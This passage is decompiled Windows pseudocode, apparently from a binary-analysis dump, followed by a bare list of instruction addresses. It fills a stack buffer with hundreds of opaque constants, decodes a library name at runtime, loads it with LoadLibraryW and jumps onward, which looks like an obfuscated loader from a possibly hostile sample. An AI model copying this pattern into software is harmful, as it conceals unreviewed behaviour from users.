				 *((intOrPtr*)(_t463 - 0x5b8)) = 0x330ec9fb;
				 *((intOrPtr*)(_t463 - 0x5b4)) = 0x128d0a18;
				 *((intOrPtr*)(_t463 - 0x5b0)) = 0xf2853133;
				 *((intOrPtr*)(_t463 - 0x5ac)) = 0xb28e8662;
				 *((intOrPtr*)(_t463 - 0x5a8)) = 0xcc6041b;
				 *((intOrPtr*)(_t463 - 0x5a4)) = 0x503860ba;
				 *((intOrPtr*)(_t463 - 0x5a0)) = 0xaf848ab6;
				 *((intOrPtr*)(_t463 - 0x59c)) = 0xc7f7d317;
				 *((intOrPtr*)(_t463 - 0x598)) = 0x13073c8b;
				 *((intOrPtr*)(_t463 - 0x594)) = 0x9052bc99;
				 *((intOrPtr*)(_t463 - 0x590)) = 0x877c99df;
				 *((intOrPtr*)(_t463 - 0x58c)) = 0x6c99bb22;
				 *((intOrPtr*)(_t463 - 0x588)) = 0x58ef0440;
				 *((intOrPtr*)(_t463 - 0x584)) = 0x34bf58b3;
				 *((intOrPtr*)(_t463 - 0x580)) = 0x5993081f;
				 *((intOrPtr*)(_t463 - 0x57c)) = 0x515bdc21;
				 *((intOrPtr*)(_t463 - 0x578)) = 0x787835c3;
				 *((intOrPtr*)(_t463 - 0x574)) = 0x87ae10eb;
				 *((intOrPtr*)(_t463 - 0x570)) = 0x32d4b469;
				 *((intOrPtr*)(_t463 - 0x56c)) = 0x661ffa4d;
				 *((intOrPtr*)(_t463 - 0x568)) = 0x98cd5178;
				 *((intOrPtr*)(_t463 - 0x564)) = 0xe5a99966;
				 *((intOrPtr*)(_t463 - 0x560)) = 0x30cc96f5;
				 *((intOrPtr*)(_t463 - 0x55c)) = 0x4bda7984;
				 *((intOrPtr*)(_t463 - 0x558)) = 0x7c3f202c;
				 *((intOrPtr*)(_t463 - 0x554)) = 0xc9dc119f;
				 *((intOrPtr*)(_t463 - 0x550)) = 0x303f7fb7;
				 *((intOrPtr*)(_t463 - 0x54c)) = 0x2f3e966e;
				 *((intOrPtr*)(_t463 - 0x548)) = 0xbe38574d;
				 *((intOrPtr*)(_t463 - 0x544)) = 0xfdd53dc6;
				 *((intOrPtr*)(_t463 - 0x540)) = 0x6159b14a;
				 *((intOrPtr*)(_t463 - 0x53c)) = 0xab550c22;
				 *((intOrPtr*)(_t463 - 0x538)) = 0x7546765d;
				 *((intOrPtr*)(_t463 - 0x534)) = 0x9db4a3a8;
				 *((intOrPtr*)(_t463 - 0x530)) = 0x8febdd9d;
				 *((intOrPtr*)(_t463 - 0x52c)) = 0x942a1da5;
				 *((intOrPtr*)(_t463 - 0x528)) = 0x8ce7803f;
				 *((intOrPtr*)(_t463 - 0x524)) = 0x8f979a1a;
				 *((intOrPtr*)(_t463 - 0x520)) = 0x4973ed66;
				 *((intOrPtr*)(_t463 - 0x51c)) = 0xf026f445;
				 *((intOrPtr*)(_t463 - 0x518)) = 0x879c0fd7;
				 *((intOrPtr*)(_t463 - 0x514)) = 0x6b636af;
				 *((intOrPtr*)(_t463 - 0x510)) = 0xfc789df7;
				 *((intOrPtr*)(_t463 - 0x50c)) = 0xe9302e0f;
				 *((intOrPtr*)(_t463 - 0x508)) = 0x6bf7e741;
				 *((intOrPtr*)(_t463 - 0x504)) = 0x98954128;
				 *((intOrPtr*)(_t463 - 0x500)) = 0x7763bde3;
				 *((intOrPtr*)(_t463 - 0x4fc)) = 0xb1f3814;
				 *((intOrPtr*)(_t463 - 0x4f8)) = 0x9f3a0dd8;
				 *((intOrPtr*)(_t463 - 0x4f4)) = 0x8eb0c0cb;
				 *((intOrPtr*)(_t463 - 0x4f0)) = 0xe5f73fe6;
				 *((intOrPtr*)(_t463 - 0x4ec)) = 0xb1e43bd0;
				 *((intOrPtr*)(_t463 - 0x4e8)) = 0x771b000e;
				 *((intOrPtr*)(_t463 - 0x4e4)) = 0xcd3fef67;
				 *((intOrPtr*)(_t463 - 0x4e0)) = 0x92be2bdc;
				 *((intOrPtr*)(_t463 - 0x4dc)) = 0xa68fa81;
				 *((intOrPtr*)(_t463 - 0x4d8)) = 0x9dad74b3;
				 *((intOrPtr*)(_t463 - 0x4d4)) = 0xc44aa636;
				 *((intOrPtr*)(_t463 - 0x4d0)) = 0xe3c10673;
				 *((intOrPtr*)(_t463 - 0x4cc)) = 0x5937842a;
				 *((intOrPtr*)(_t463 - 0x4c8)) = 0x194c927d;
				 *((intOrPtr*)(_t463 - 0x4c4)) = 0x68ba32e5;
				 *((intOrPtr*)(_t463 - 0x4c0)) = 0x9d9ca700;
				 *((intOrPtr*)(_t463 - 0x4bc)) = 0xe42720fb;
				 *((intOrPtr*)(_t463 - 0x4b8)) = 0x97bf4093;
				 *((intOrPtr*)(_t463 - 0x4b4)) = 0xe480a8ff;
				 *((intOrPtr*)(_t463 - 0x4b0)) = 0xade1974;
				 *((intOrPtr*)(_t463 - 0x4ac)) = 0xe9af4224;
				 *((intOrPtr*)(_t463 - 0x4a8)) = 0x96d703c2;
				 *((intOrPtr*)(_t463 - 0x4a4)) = 0xe04a501d;
				 *((intOrPtr*)(_t463 - 0x4a0)) = 0x1e77706d;
				 *((intOrPtr*)(_t463 - 0x49c)) = 0xb7f78974;
				 *((intOrPtr*)(_t463 - 0x498)) = 0x76fc7a7a;
				 *((intOrPtr*)(_t463 - 0x494)) = 0xeab1e862;
				 *((intOrPtr*)(_t463 - 0x490)) = 0xc448d29a;
				 *((intOrPtr*)(_t463 - 0x48c)) = 0xcfdfd93a;
				 *((intOrPtr*)(_t463 - 0x488)) = 0xc00b719e;
				 *((intOrPtr*)(_t463 - 0x484)) = 0x5c421644;
				 *((intOrPtr*)(_t463 - 0x480)) = 0xef8a9d35;
				 *((intOrPtr*)(_t463 - 0x47c)) = 0xc2f9cdbf;
				 *((intOrPtr*)(_t463 - 0x478)) = 0xd75ab0e4;
				 *((intOrPtr*)(_t463 - 0x474)) = 0xd4fd446f;
				 *((intOrPtr*)(_t463 - 0x470)) = 0x6c0d7af9;
				 *((intOrPtr*)(_t463 - 0x46c)) = 0x2423c84f;
				 *((intOrPtr*)(_t463 - 0x468)) = 0xd6fd3e2b;
				 *((intOrPtr*)(_t463 - 0x464)) = 0x65814f77;
				 *((intOrPtr*)(_t463 - 0x460)) = 0x1075fea8;
				 *((intOrPtr*)(_t463 - 0x45c)) = 0xdc9dee07;
				 *((intOrPtr*)(_t463 - 0x458)) = 0x3bbee7e7;
				 *((intOrPtr*)(_t463 - 0x454)) = 0xf7a6cff8;
				 *((intOrPtr*)(_t463 - 0x450)) = 0xc5e08db9;
				 *((intOrPtr*)(_t463 - 0x44c)) = 0x8e09787f;
				 *((intOrPtr*)(_t463 - 0x448)) = 0x75053736;
				 *((intOrPtr*)(_t463 - 0x444)) = 0x3746f159;
				 *((intOrPtr*)(_t463 - 0x440)) = 0x81da0dce;
				 *((intOrPtr*)(_t463 - 0x43c)) = 0x8a31c1eb;
				 *((intOrPtr*)(_t463 - 0x438)) = 0x42ec62d3;
				 *((intOrPtr*)(_t463 - 0x434)) = 0x1ffe42cb;
				 *((intOrPtr*)(_t463 - 0x430)) = 0x7d8d2ccb;
				 *((intOrPtr*)(_t463 - 0x42c)) = 0xbe5a5ea0;
				 *((intOrPtr*)(_t463 - 0x428)) = 0x6a48c00;
				 *((intOrPtr*)(_t463 - 0x424)) = 0xb9ed38e0;
				 *((intOrPtr*)(_t463 - 0x420)) = 0xbd2dc679;
				 *((intOrPtr*)(_t463 - 0x41c)) = 0x39aa03f5;
				 *((intOrPtr*)(_t463 - 0x418)) = 0xd7ee1a12;
				 *((intOrPtr*)(_t463 - 0x414)) = 0xfbea6635;
				 *((intOrPtr*)(_t463 - 0x410)) = 0x89b73866;
				 *((intOrPtr*)(_t463 - 0x40c)) = 0xe12bc354;
				 *((intOrPtr*)(_t463 - 0x408)) = 0x81996796;
				 *((intOrPtr*)(_t463 - 0x404)) = 0x7a4d18fa;
				 *((intOrPtr*)(_t463 - 0x400)) = 0xa06479c8;
				 *((intOrPtr*)(_t463 - 0x3fc)) = 0xb2b87b6c;
				 *((intOrPtr*)(_t463 - 0x3f8)) = 0x960cae1e;
				 *((intOrPtr*)(_t463 - 0x3f4)) = 0x92721397;
				 *((intOrPtr*)(_t463 - 0x3f0)) = 0x855794d2;
				 *((intOrPtr*)(_t463 - 0x3ec)) = 0x6e2783f0;
				 *((intOrPtr*)(_t463 - 0x3e8)) = 0x2990bcc4;
				 *((intOrPtr*)(_t463 - 0x3e4)) = 0xa275d0b2;
				 *((intOrPtr*)(_t463 - 0x3e0)) = 0x38acfc38;
				 *((intOrPtr*)(_t463 - 0x3dc)) = 0x7e4b475a;
				 *((intOrPtr*)(_t463 - 0x3d8)) = 0xcc650a45;
				 *((intOrPtr*)(_t463 - 0x3d4)) = 0x46ee7d90;
				 *((intOrPtr*)(_t463 - 0x3d0)) = 0x52db6a12;
				 *((intOrPtr*)(_t463 - 0x3cc)) = 0xcb5cc8b3;
				 *((intOrPtr*)(_t463 - 0x3c8)) = 0x8d274237;
				 *((intOrPtr*)(_t463 - 0x3c4)) = 0x2db6abbb;
				 *((intOrPtr*)(_t463 - 0x3c0)) = 0x73173549;
				 *((intOrPtr*)(_t463 - 0x3bc)) = 0xa3bc4232;
				 *((intOrPtr*)(_t463 - 0x3b8)) = 0xd9cd433c;
				 *((intOrPtr*)(_t463 - 0x3b4)) = 0x3831378e;
				 *((intOrPtr*)(_t463 - 0x3b0)) = 0x15d26c3d;
				 *((intOrPtr*)(_t463 - 0x3ac)) = 0x44991ce8;
				 *((intOrPtr*)(_t463 - 0x3a8)) = 0x1a59124e;
				 *((intOrPtr*)(_t463 - 0x3a4)) = 0x263f8333;
				 *((intOrPtr*)(_t463 - 0x3a0)) = 0xccd93843;
				 *((intOrPtr*)(_t463 - 0x39c)) = 0x254056e4;
				 *((intOrPtr*)(_t463 - 0x398)) = 0x11a185;
				 *((intOrPtr*)(_t463 - 0x394)) = 0x423c572c;
				 *((intOrPtr*)(_t463 - 0x390)) = 0x4d0fadf5;
				 *((intOrPtr*)(_t463 - 0x38c)) = 0xb32a5f7d;
				 *((intOrPtr*)(_t463 - 0x388)) = 0xbdf26336;
				 *((intOrPtr*)(_t463 - 0x384)) = 0xdc9b118e;
				 *((intOrPtr*)(_t463 - 0x380)) = 0xabfa5a90;
				 *((intOrPtr*)(_t463 - 0x37c)) = 0x512d3105;
				 *((intOrPtr*)(_t463 - 0x378)) = 0x3a65580d;
				 *((intOrPtr*)(_t463 - 0x374)) = 0x964bedc9;
				 *((intOrPtr*)(_t463 - 0x370)) = 0x2856c777;
				 *((intOrPtr*)(_t463 - 0x36c)) = 0x8390ded5;
				 *((intOrPtr*)(_t463 - 0x368)) = 0xf9ed8b2;
				 *((intOrPtr*)(_t463 - 0x364)) = 0xd01694f2;
				 *((intOrPtr*)(_t463 - 0x360)) = 0x87c295b3;
				 *((intOrPtr*)(_t463 - 0x35c)) = 0x49c46db9;
				 *((intOrPtr*)(_t463 - 0x358)) = 0x1dd48e6e;
				 *((intOrPtr*)(_t463 - 0x354)) = 0x2e721092;
				 *((intOrPtr*)(_t463 - 0x350)) = 0xe52ecf7a;
				 *((intOrPtr*)(_t463 - 0x34c)) = 0x17cdda0e;
				 *((intOrPtr*)(_t463 - 0x348)) = 0x3c53b6fe;
				 *((intOrPtr*)(_t463 - 0x344)) = 0x8f48d565;
				 *((intOrPtr*)(_t463 - 0x340)) = 0x43993e39;
				 *((intOrPtr*)(_t463 - 0x33c)) = 0xed09bdf2;
				 *((intOrPtr*)(_t463 - 0x338)) = 0x5961145a;
				 *((intOrPtr*)(_t463 - 0x334)) = 0x8526533d;
				 *((intOrPtr*)(_t463 - 0x330)) = 0x5ef91ba8;
				 *((intOrPtr*)(_t463 - 0x32c)) = 0x37d2b4a0;
				 *((intOrPtr*)(_t463 - 0x328)) = 0x58989eca;
				 *((intOrPtr*)(_t463 - 0x324)) = 0x27e39b75;
				 *((intOrPtr*)(_t463 - 0x320)) = 0x4920552a;
				 *((intOrPtr*)(_t463 - 0x31c)) = 0xa51805b7;
				 *((intOrPtr*)(_t463 - 0x318)) = 0x5f77e1a5;
				 *((intOrPtr*)(_t463 - 0x314)) = 0x410ccda1;
				 *((intOrPtr*)(_t463 - 0x310)) = 0x379f9fab;
				 *((intOrPtr*)(_t463 - 0x30c)) = 0x710f10e1;
				 *((intOrPtr*)(_t463 - 0x308)) = 0xb6b377ac;
				 *((intOrPtr*)(_t463 - 0x304)) = 0xead8e01d;
				 *((intOrPtr*)(_t463 - 0x300)) = 0x6a300eb6;
				 *((intOrPtr*)(_t463 - 0x2fc)) = 0xac9f4aef;
				 *((intOrPtr*)(_t463 - 0x2f8)) = 0x94963b8;
				 *((intOrPtr*)(_t463 - 0x2f4)) = 0x2ef621cb;
				 *((intOrPtr*)(_t463 - 0x2f0)) = 0x2a7e912c;
				 *((intOrPtr*)(_t463 - 0x2ec)) = 0x8b888c91;
				 *((intOrPtr*)(_t463 - 0x2e8)) = 0x10c13f0e;
				 *((intOrPtr*)(_t463 - 0x2e4)) = 0x941a2f31;
				 *((intOrPtr*)(_t463 - 0x2e0)) = 0x36c6129f;
				 *((intOrPtr*)(_t463 - 0x2dc)) = 0xe4c725f;
				 *((intOrPtr*)(_t463 - 0x2d8)) = 0x93c307ef;
				 *((intOrPtr*)(_t463 - 0x2d4)) = 0xf47416f5;
				 *((intOrPtr*)(_t463 - 0x2d0)) = 0x220e9ff0;
				 *((intOrPtr*)(_t463 - 0x2cc)) = 0xd7051b24;
				 *((intOrPtr*)(_t463 - 0x2c8)) = 0x8f2fd263;
				 *((intOrPtr*)(_t463 - 0x2c4)) = 0x42bb64f7;
				 *((intOrPtr*)(_t463 - 0x2c0)) = 0xf2f5df1e;
				 *((intOrPtr*)(_t463 - 0x2bc)) = 0xe5fcf499;
				 *((intOrPtr*)(_t463 - 0x2b8)) = 0x86e73;
				 *((intOrPtr*)(_t463 - 0x2b4)) = 0x917adac0;
				 *((intOrPtr*)(_t463 - 0x2b0)) = 0x82542f5;
				 *((intOrPtr*)(_t463 - 0x2ac)) = 0x7169b7c0;
				 *((intOrPtr*)(_t463 - 0x2a8)) = 0x55e8de5d;
				 *((intOrPtr*)(_t463 - 0x2a4)) = 0xc98de486;
				 *((intOrPtr*)(_t463 - 0x2a0)) = 0xa5f9dee8;
				 *((intOrPtr*)(_t463 - 0x29c)) = 0xae4f25d;
				 *((intOrPtr*)(_t463 - 0x298)) = 0x89c4da91;
				 *((intOrPtr*)(_t463 - 0x294)) = 0xd9280baf;
				 *((intOrPtr*)(_t463 - 0x290)) = 0x7efcb77b;
				 *((intOrPtr*)(_t463 - 0x28c)) = 0x8c5129e7;
				 *((intOrPtr*)(_t463 - 0x288)) = 0xee2a51d4;
				 *((intOrPtr*)(_t463 - 0x284)) = 0xae4a5ea0;
				 *((intOrPtr*)(_t463 - 0x280)) = 0xc3b14c11;
				 *((intOrPtr*)(_t463 - 0x27c)) = 0x8839fd47;
				 *((intOrPtr*)(_t463 - 0x278)) = 0xbee9fc8a;
				 *((intOrPtr*)(_t463 - 0x274)) = 0xcc2c1586;
				 *((intOrPtr*)(_t463 - 0x270)) = 0xd020ad33;
				 *((intOrPtr*)(_t463 - 0x26c)) = 0x9010167f;
				 *((intOrPtr*)(_t463 - 0x268)) = 0x9ff2789b;
				 *((intOrPtr*)(_t463 - 0x264)) = 0xb5ee5a36;
				 *((intOrPtr*)(_t463 - 0x260)) = 0x8025f2ba;
				 *((intOrPtr*)(_t463 - 0x25c)) = 0xf3c300eb;
				 *((intOrPtr*)(_t463 - 0x258)) = 0x5d0d2b8a;
				 *((intOrPtr*)(_t463 - 0x254)) = 0x6f09a1e9;
				 *((intOrPtr*)(_t463 - 0x250)) = 0xda430b01;
				 *((intOrPtr*)(_t463 - 0x24c)) = 0xc81c23b9;
				 *((intOrPtr*)(_t463 - 0x248)) = 0x8b4f3ac9;
				 *((intOrPtr*)(_t463 - 0x244)) = 0xe8e448f9;
				 *((intOrPtr*)(_t463 - 0x240)) = 0x71ab7e57;
				 *((intOrPtr*)(_t463 - 0x23c)) = 0x365e1ce1;
				 *((intOrPtr*)(_t463 - 0x238)) = 0xec4ce2b5;
				 *((intOrPtr*)(_t463 - 0x234)) = 0xb1697b33;
				 *((intOrPtr*)(_t463 - 0x230)) = 0xd54212f6;
				 *((intOrPtr*)(_t463 - 0x22c)) = 0xb3b8e6f2;
				 *((intOrPtr*)(_t463 - 0x228)) = 0x8dcb06ce;
				 *((intOrPtr*)(_t463 - 0x224)) = 0x2fca0a18;
				 *((intOrPtr*)(_t463 - 0x220)) = 0x4c1ce5f;
				 *((intOrPtr*)(_t463 - 0x21c)) = 0xbde3659e;
				 *((intOrPtr*)(_t463 - 0x218)) = 0x36eced2;
				 *((intOrPtr*)(_t463 - 0x214)) = 0x4ddfb142;
				 *((intOrPtr*)(_t463 - 0x210)) = 0xd6115c70;
				 *((intOrPtr*)(_t463 - 0x20c)) = 0x9da12f2a;
				 *((intOrPtr*)(_t463 - 0x208)) = 0xdadc95be;
				 *((intOrPtr*)(_t463 - 0x204)) = 0x3574398b;
				 *((intOrPtr*)(_t463 - 0x200)) = 0xc1e64aa9;
				 *((intOrPtr*)(_t463 - 0x1fc)) = 0x2f067620;
				 *((intOrPtr*)(_t463 - 0x1f8)) = 0x127d19ca;
				 *((intOrPtr*)(_t463 - 0x1f4)) = 0x31849cb6;
				 *((intOrPtr*)(_t463 - 0x1f0)) = 0xa2873b49;
				 *((intOrPtr*)(_t463 - 0x1ec)) = 0x7af4f8cb;
				 *((intOrPtr*)(_t463 - 0x1e8)) = 0xc99a140b;
				 *((intOrPtr*)(_t463 - 0x1e4)) = 0xd08da1c3;
				 *((intOrPtr*)(_t463 - 0x1e0)) = 0x6bd4d31d;
				 *((intOrPtr*)(_t463 - 0x1dc)) = 0x9c783407;
				 *((intOrPtr*)(_t463 - 0x1d8)) = 0x3b5c6e41;
				 *((intOrPtr*)(_t463 - 0x1d4)) = 0x4745905a;
				 *((intOrPtr*)(_t463 - 0x1d0)) = 0x360d7956;
				 *((intOrPtr*)(_t463 - 0x1cc)) = 0x31e7a990;
				 *((intOrPtr*)(_t463 - 0x1c8)) = 0x22ca18bd;
				 *((intOrPtr*)(_t463 - 0x1c4)) = 0x81a7a290;
				 *((intOrPtr*)(_t463 - 0x1c0)) = 0x52ca4368;
				 *((intOrPtr*)(_t463 - 0x1bc)) = 0x6b0288f2;
				 *((intOrPtr*)(_t463 - 0x1b8)) = 0x6469c6be;
				 *((intOrPtr*)(_t463 - 0x1b4)) = 0xc8699152;
				 *((intOrPtr*)(_t463 - 0x1b0)) = 0x4ccc5a87;
				 *((intOrPtr*)(_t463 - 0x1ac)) = 0xf4b0c619;
				 *((intOrPtr*)(_t463 - 0x1a8)) = 0x36419956;
				 *((intOrPtr*)(_t463 - 0x1a4)) = 0x48c65e2c;
				 *((intOrPtr*)(_t463 - 0x1a0)) = 0x8a727e35;
				 *((intOrPtr*)(_t463 - 0x19c)) = 0x1ec4972;
				 *((intOrPtr*)(_t463 - 0x198)) = 0xa05eb2f8;
				 *((intOrPtr*)(_t463 - 0x194)) = 0x66788d5a;
				 *((intOrPtr*)(_t463 - 0x190)) = 0x56f7265e;
				 *((intOrPtr*)(_t463 - 0x18c)) = 0xda28f248;
				 *((intOrPtr*)(_t463 - 0x188)) = 0xaac23347;
				 *((intOrPtr*)(_t463 - 0x184)) = 0xd1dedcd1;
				 *((intOrPtr*)(_t463 - 0x180)) = 0x4dc26aad;
				 *((intOrPtr*)(_t463 - 0x17c)) = 0x57641d9e;
				 *((intOrPtr*)(_t463 - 0x178)) = 0x2443dfcd;
				 *((intOrPtr*)(_t463 - 0x174)) = 0xb8c01852;
				 *((intOrPtr*)(_t463 - 0x170)) = 0x1c7941fd;
				 *((intOrPtr*)(_t463 - 0x16c)) = 0xcb796a74;
				 *((intOrPtr*)(_t463 - 0x168)) = 0xc28e2e87;
				 *((intOrPtr*)(_t463 - 0x164)) = 0xa45bfb0a;
				 *((intOrPtr*)(_t463 - 0x160)) = 0x7bc0412;
				 *((intOrPtr*)(_t463 - 0x15c)) = 0xd90e0108;
				 *((intOrPtr*)(_t463 - 0x158)) = 0x169acac2;
				 *((intOrPtr*)(_t463 - 0x154)) = 0x300e0d77;
				 *((intOrPtr*)(_t463 - 0x150)) = 0x8e0481c8;
				 *((intOrPtr*)(_t463 - 0x14c)) = 0x5e209984;
				 *((intOrPtr*)(_t463 - 0x148)) = 0xbe02a08b;
				 *((intOrPtr*)(_t463 - 0x144)) = 0xa7a66393;
				 *((intOrPtr*)(_t463 - 0x140)) = 0x8a22029d;
				 *((intOrPtr*)(_t463 - 0x13c)) = 0xbfc8486d;
				 *((intOrPtr*)(_t463 - 0x138)) = 0x781a2d70;
				 *((intOrPtr*)(_t463 - 0x134)) = 0x80b21b5e;
				 *((intOrPtr*)(_t463 - 0x130)) = 0x7441948;
				 *((intOrPtr*)(_t463 - 0x12c)) = 0xd41f7b57;
				 *((intOrPtr*)(_t463 - 0x128)) = 0xe04edfcb;
				 *((intOrPtr*)(_t463 - 0x124)) = 0x87848915;
				 *((intOrPtr*)(_t463 - 0x120)) = 0xa3fe93d0;
				 *((intOrPtr*)(_t463 - 0x11c)) = 0x7b43b7c7;
				 *((intOrPtr*)(_t463 - 0x118)) = 0x71eb1ebe;
				 *((intOrPtr*)(_t463 - 0x114)) = 0x3fc3cf06;
				 *((intOrPtr*)(_t463 - 0x110)) = 0xe099602f;
				 *((intOrPtr*)(_t463 - 0x10c)) = 0xef6eace7;
				 *((intOrPtr*)(_t463 - 0x108)) = 0xfe2f55a3;
				 *((intOrPtr*)(_t463 - 0x104)) = 0x50297237;
				 *((intOrPtr*)(_t463 - 0x100)) = 0x7ab2c6b1;
				 *((intOrPtr*)(_t463 - 0xfc)) = 0xd7712ace;
				 *((intOrPtr*)(_t463 - 0xf8)) = 0x4dfcead3;
				 *((intOrPtr*)(_t463 - 0xf4)) = 0x89bd62f5;
				 *((intOrPtr*)(_t463 - 0xf0)) = 0x43947872;
				 *((intOrPtr*)(_t463 - 0xec)) = 0xafd5e012;
				 *((intOrPtr*)(_t463 - 0xe8)) = 0xcdbfaa54;
				 *((intOrPtr*)(_t463 - 0xe4)) = 0xddbbdc60;
				 *((intOrPtr*)(_t463 - 0xe0)) = 0x7d5aea78;
				 *((intOrPtr*)(_t463 - 0xdc)) = 0xec9116d3;
				 *((intOrPtr*)(_t463 - 0xd8)) = 0xd2ec0453;
				 *((intOrPtr*)(_t463 - 0xd4)) = 0x62656cfd;
				 *((intOrPtr*)(_t463 - 0xd0)) = 0x746b28c7;
				 *((intOrPtr*)(_t463 - 0xcc)) = 0x3d2f2bfd;
				 *((intOrPtr*)(_t463 - 0xc8)) = 0x10f71dd2;
				 *((intOrPtr*)(_t463 - 0xc4)) = 0x7761a633;
				 *((intOrPtr*)(_t463 - 0xc0)) = 0x112310e8;
				 *((intOrPtr*)(_t463 - 0xbc)) = 0x9abef716;
				 *((intOrPtr*)(_t463 - 0xb8)) = 0x210efd2e;
				 *((intOrPtr*)(_t463 - 0xb4)) = 0x54b4385a;
				 *((intOrPtr*)(_t463 - 0xb0)) = 0xc547a5c1;
				 *((intOrPtr*)(_t463 - 0xac)) = 0x8a213ab;
				 *((intOrPtr*)(_t463 - 0xa8)) = 0x260c246d;
				 *((intOrPtr*)(_t463 - 0xa4)) = 0x203e3bea;
				 *((intOrPtr*)(_t463 - 0xa0)) = 0xfa5f14d3;
				 *((intOrPtr*)(_t463 - 0x9c)) = 0xf559ef4b;
				 *((intOrPtr*)(_t463 - 0x98)) = 0x444e4cb4;
				 *((intOrPtr*)(_t463 - 0x94)) = 0x274ccac7;
				 *((intOrPtr*)(_t463 - 0x90)) = 0x11036e68;
				 *((intOrPtr*)(_t463 - 0x8c)) = 0xe0b0320a;
				 *((intOrPtr*)(_t463 - 0x88)) = 0xf6e7f312;
				 *((intOrPtr*)(_t463 - 0x84)) = 0xb116a956;
				 *((intOrPtr*)(_t463 - 0x80)) = 0xd583cb23;
				 *((intOrPtr*)(_t463 - 0x7c)) = 0xf9453082;
				 *((intOrPtr*)(_t463 - 0x78)) = 0xb3e4f498;
				 *((intOrPtr*)(_t463 - 0x74)) = 0x985422;
				 *((intOrPtr*)(_t463 - 0x70)) = 0x1af45694;
				 *((intOrPtr*)(_t463 - 0x6c)) = 0x56bee25f;
				 *((intOrPtr*)(_t463 - 0x68)) = 0x17e0422f;
				 *((intOrPtr*)(_t463 - 0x64)) = 0xae1efe3d;
				 *((intOrPtr*)(_t463 - 0x60)) = 0x4e0fee18;
				 *((intOrPtr*)(_t463 - 0x5c)) = 0x8fb0c196;
				 *((intOrPtr*)(_t463 - 0x58)) = 0x8c574b2b;
				 *((intOrPtr*)(_t463 - 0x54)) = 0xee1ba36b;
				 *((intOrPtr*)(_t463 - 0x50)) = 0xb4450d93;
				 *((intOrPtr*)(_t463 - 0x4c)) = 0x4b9bdf79;
				 *((intOrPtr*)(_t463 - 0x48)) = 0x20e2b4c6;
				 *((intOrPtr*)(_t463 - 0x44)) = 0xa6fe7617;
				 *((intOrPtr*)(_t463 - 0x40)) = 0xce77743f;
				 *((intOrPtr*)(_t463 - 0x3c)) = 0xed2f08ba;
				 *((intOrPtr*)(_t463 - 0x38)) = 0xb7a020b5;
				 *((intOrPtr*)(_t463 - 0x34)) = 0x5049adfa;
				 *((intOrPtr*)(_t463 - 0x30)) = 0x4653483e;
				 *((intOrPtr*)(_t463 - 0x2c)) = 0xf88fc154;
				 *((intOrPtr*)(_t463 - 0x28)) = 0x2170b424;
				 *((intOrPtr*)(_t463 - 0x24)) = 0x97127f63;
				 *((intOrPtr*)(_t463 - 0x20)) = 0x2c72e78b;
				 *((intOrPtr*)(_t463 - 0x1c)) = 0xa4a4af2b;
				 *((intOrPtr*)(_t463 - 0x18)) = 0xa22f88e1;
				 *((intOrPtr*)(_t463 - 0x14)) = 0x26e727d2;
				 *((intOrPtr*)(_t463 - 0x10)) = 0xba3bd70d;
				 *((intOrPtr*)(_t463 - 0xc)) = 0x532c4572;
				 *((intOrPtr*)(_t463 - 8)) = 0x72bb8f8c;
				 *((intOrPtr*)(_t463 - 4)) = 0x92993252;
				_t461 = L00401D00(0x412650, 0x110, _t459);
				 *0x417c78 = LoadLibraryW(_t461);
				_t452 = HeapFree(GetProcessHeap(), 0, _t461);
				_t456 =  *0x417c78;
				_t462 = 0x1f5c6a;
				if( *0x417c78 != 0) {
					goto 0x4216c5;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return L00401480(_t454, _t456, _t463 - 0x6fc, _t459, _t462);
				} else {
					goto 0x4216b2;
					return _t452;
				}
			}

0x0040717a
0x00407184
0x0040718e
0x00407198
0x004071a2
0x004071ac
0x004071b6
0x004071c0
0x004071ca
0x004071d4
0x004071de
0x004071e8
0x004071f2
0x004071fc
0x00407206
0x00407210
0x0040721a
0x00407224
0x0040722e
0x00407238
0x00407242
0x0040724c
0x00407256
0x00407260
0x0040726a
0x00407274
0x0040727e
0x00407288
0x00407292
0x0040729c
0x004072a6
0x004072b0
0x004072ba
0x004072c4
0x004072ce
0x004072d8
0x004072e2
0x004072ec
0x004072f6
0x00407300
0x0040730a
0x00407314
0x0040731e
0x00407328
0x00407332
0x0040733c
0x00407346
0x00407350
0x0040735a
0x00407364
0x0040736e
0x00407378
0x00407382
0x0040738c
0x00407396
0x004073a0
0x004073aa
0x004073b4
0x004073be
0x004073c8
0x004073d2
0x004073dc
0x004073e6
0x004073f0
0x004073fa
0x00407404
0x0040740e
0x00407418
0x00407422
0x0040742c
0x00407436
0x00407440
0x0040744a
0x00407454
0x0040745e
0x00407468
0x00407472
0x0040747c
0x00407486
0x00407490
0x0040749a
0x004074a4
0x004074ae
0x004074b8
0x004074c2
0x004074cc
0x004074d6
0x004074e0
0x004074ea
0x004074f4
0x004074fe
0x00407508
0x00407512
0x0040751c
0x00407526
0x00407530
0x0040753a
0x00407544
0x0040754e
0x00407558
0x00407562
0x0040756c
0x00407576
0x00407580
0x0040758a
0x00407594
0x0040759e
0x004075a8
0x004075b2
0x004075bc
0x004075c6
0x004075d0
0x004075da
0x004075e4
0x004075ee
0x004075f8
0x00407602
0x0040760c
0x00407616
0x00407620
0x0040762a
0x00407634
0x0040763e
0x00407648
0x00407652
0x0040765c
0x00407666
0x00407670
0x0040767a
0x00407684
0x0040768e
0x00407698
0x004076a2
0x004076ac
0x004076b6
0x004076c0
0x004076ca
0x004076d4
0x004076de
0x004076e8
0x004076f2
0x004076fc
0x00407706
0x00407710
0x0040771a
0x00407724
0x0040772e
0x00407738
0x00407742
0x0040774c
0x00407756
0x00407760
0x0040776a
0x00407774
0x0040777e
0x00407788
0x00407792
0x0040779c
0x004077a6
0x004077b0
0x004077ba
0x004077c4
0x004077ce
0x004077d8
0x004077e2
0x004077ec
0x004077f6
0x00407800
0x0040780a
0x00407814
0x0040781e
0x00407828
0x00407832
0x0040783c
0x00407846
0x00407850
0x0040785a
0x00407864
0x0040786e
0x00407878
0x00407882
0x0040788c
0x00407896
0x004078a0
0x004078aa
0x004078b4
0x004078be
0x004078c8
0x004078d2
0x004078dc
0x004078e6
0x004078f0
0x004078fa
0x00407904
0x0040790e
0x00407918
0x00407922
0x0040792c
0x00407936
0x00407940
0x0040794a
0x00407954
0x0040795e
0x00407968
0x00407972
0x0040797c
0x00407986
0x00407990
0x0040799a
0x004079a4
0x004079ae
0x004079b8
0x004079c2
0x004079cc
0x004079d6
0x004079e0
0x004079ea
0x004079f4
0x004079fe
0x00407a08
0x00407a12
